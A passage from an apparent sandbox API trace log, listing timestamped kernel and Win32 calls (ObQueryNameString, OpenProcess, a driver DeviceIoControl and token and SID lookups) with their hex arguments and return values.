ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.985] ObQueryNameString (in: Object=0xffffe0006a01c7f0, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.985] ObQueryNameString (in: Object=0xffffc001492a5330, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.986] ObQueryNameString (in: Object=0xffffe0006a025090, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.986] ObQueryNameString (in: Object=0xffffc0014a2e9080, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.986] ObQueryNameString (in: Object=0xffffc001494788b0, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.986] ObQueryNameString (in: Object=0xffffe0006a08af20, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.986] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.986] ObQueryNameString (in: Object=0xffffe0006a018090, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.986] ObQueryNameString (in: Object=0xffffe0006a257380, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.986] ObQueryNameString (in: Object=0xffffc0014962add0, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.986] ObQueryNameString (in: Object=0xffffc001496f5200, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.986] ObQueryNameString (in: Object=0xffffc00149724270, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.986] ObQueryNameString (in: Object=0xffffe0007ddf3aa0, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x698) returned 0x180 [0264.986] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0264.986] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069e34840, HandleInformation=0x0) returned 0x0 [0264.986] ObOpenObjectByPointer (in: Object=0xffffe00069e34840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.986] ObfDereferenceObject (Object=0xffffe00069e34840) returned 0x2ffe7 [0264.986] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe00069bad100 | out: TokenHandle=0xffffe00069bad100*=0x1a8) returned 0x0 [0264.986] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.986] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.986] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.987] CloseHandle (hObject=0x1a8) returned 1 [0264.987] CloseHandle (hObject=0x180) returned 1 [0264.987] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.987] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.987] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.987] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.987] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.988] ObQueryNameString (in: Object=0xffffc0014858d720, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.988] ObQueryNameString (in: Object=0xffffc001492a5330, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.988] ObQueryNameString (in: Object=0xffffe0006a274830, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x180 [0264.988] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0264.988] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069ef4840, HandleInformation=0x0) returned 0x0 [0264.988] ObOpenObjectByPointer (in: Object=0xffffe00069ef4840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.988] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x66991 [0264.988] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe00069bad100 | out: TokenHandle=0xffffe00069bad100*=0x1a8) returned 0x0 [0264.988] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.988] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.988] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.989] CloseHandle (hObject=0x1a8) returned 1 [0264.989] CloseHandle (hObject=0x180) returned 1 [0264.989] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.989] ObQueryNameString (in: Object=0xffffe00069bf6d00, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.989] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.989] ObQueryNameString (in: Object=0xffffc0014858d720, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.989] ObQueryNameString (in: Object=0xffffc001492a5330, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.989] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.989] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.989] ObQueryNameString (in: Object=0xffffc00148aaea80, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.989] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.989] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.989] ObQueryNameString (in: Object=0xffffe00069db0c60, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.989] ObQueryNameString (in: Object=0xffffc0014933f5b0, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.989] ObQueryNameString (in: Object=0xffffc00149348790, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffe00069db8900, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffe00069a93ba0, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffe00069aeacc0, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffc00148565d70, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffc00148555690, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffc00149312fc0, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffc00149312fc0, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffc00149334bd0, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffc0014935ec90, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffc0014935ec90, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffc0014933f5b0, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffc00149368c40, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.990] ObQueryNameString (in: Object=0xffffc00149368c40, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffc0014890a630, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffc0014890a630, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffc00149377b50, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffc001488f8e00, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffc001488f8e00, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffc00149390080, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffe000731c9d20, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffc00148993080, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffc00149377b50, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffe00069f7d650, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.991] ObQueryNameString (in: Object=0xffffe00069f80db0, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.729] ObQueryNameString (in: Object=0xffffe00069f7ab80, ObjectNameInfo=0xffffe00068427304, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068427304, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.730] ObQueryNameString (in: Object=0xffffe00069f80f20, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.730] ObQueryNameString (in: Object=0xffffe0006a2a8db0, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.730] ObQueryNameString (in: Object=0xffffe0006a2a8f20, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.730] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0265.730] ObQueryNameString (in: Object=0xffffc00149bcb8a0, ObjectNameInfo=0xffffe00068a82044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a82044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.730] ObQueryNameString (in: Object=0xffffe00069f86630, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.730] ObQueryNameString (in: Object=0xffffc00149314fc0, ObjectNameInfo=0xffffe0006a56c304, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a56c304, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.730] ObQueryNameString (in: Object=0xffffc00149314fc0, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.731] ObQueryNameString (in: Object=0xffffc00149ad83c0, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.731] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0265.731] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0265.731] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0265.731] ObQueryNameString (in: Object=0xffffc001493baa60, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffe00069fc0590, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffc00149424fc0, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffc00149424fc0, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffc001493f6bb0, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffc001493f6bb0, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffc00149424400, ObjectNameInfo=0xffffe0006a7a3044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a7a3044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffc00149424400, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffc0014940bad0, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffc0014940bad0, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffc00149412790, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffc00149412790, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.732] ObQueryNameString (in: Object=0xffffc00149424ae0, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0265.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b0) returned 0x180 [0265.736] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, 